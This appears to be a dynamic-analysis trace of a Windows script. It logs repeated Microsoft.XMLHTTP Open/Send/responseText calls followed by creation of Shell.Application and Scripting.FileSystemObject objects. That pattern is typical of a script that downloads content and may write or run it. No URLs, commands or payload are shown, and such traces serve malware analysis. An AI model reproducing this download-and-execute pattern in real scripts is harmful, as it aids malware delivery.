	[0451.640] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0451.640] XMLHTTPRequest:IUnknown:Release (This=0x49c72b8) returned 0x0
	[0451.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0451.641] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0451.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0451.641] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0451.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0451.641] longjmp () 
	[0451.641] longjmp () 
	[0451.641] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0451.641] SysStringLen (param_1=0x0) returned 0x0
	[0451.641] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0451.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0451.641] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0451.641] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0451.641] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0451.641] ??2@YAPEAX_K@Z () returned 0x62f330
	[0451.642] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f330) 
	[0451.642] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0451.642] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0451.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0451.642] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0451.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0451.642] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0451.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0451.642] longjmp () 
	[0451.642] longjmp () 
	[0451.642] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0451.642] SysStringLen (param_1=0x0) returned 0x0
	[0451.642] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0451.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0451.643] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0451.643] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0451.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72b8) returned 0x0
	[0451.643] ??2@YAPEAX_K@Z () returned 0x62f310
	[0451.643] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72b8, pUnkSite=0x62f310) 
	[0451.643] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0451.643] XMLHTTPRequest:IUnknown:Release (This=0x49c72b8) returned 0x0
	[0451.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0451.643] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0451.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0451.643] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0451.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0451.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0451.643] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0451.643] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0453.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0453.141] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0453.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0453.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0453.141] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0453.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0453.141] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0453.141] SysStringLen (param_1=0x0) returned 0x0
	[0453.141] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0453.142] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0453.142] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0453.142] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0453.142] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0453.142] ??2@YAPEAX_K@Z () returned 0x62f350
	[0453.142] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0453.142] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0453.142] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0453.142] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0453.142] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0453.142] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0453.142] SysStringLen (param_1=0x0) returned 0x0
	[0453.142] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0453.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0453.145] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0453.145] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0453.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0453.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0453.145] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0454.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0454.770] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0454.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0454.771] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0454.771] SysStringLen (param_1=0x0) returned 0x0
	[0454.771] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0454.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0454.772] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0454.772] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0454.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0454.772] ??2@YAPEAX_K@Z () returned 0x62f310
	[0454.772] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f310) 
	[0454.772] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0454.772] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0454.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0454.772] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0454.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0454.772] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0454.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0454.775] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0454.775] SysStringLen (param_1=0x0) returned 0x0
	[0454.775] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0454.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0454.776] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0454.776] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0454.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0454.776] ??2@YAPEAX_K@Z () returned 0x62f330
	[0454.776] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f330) 
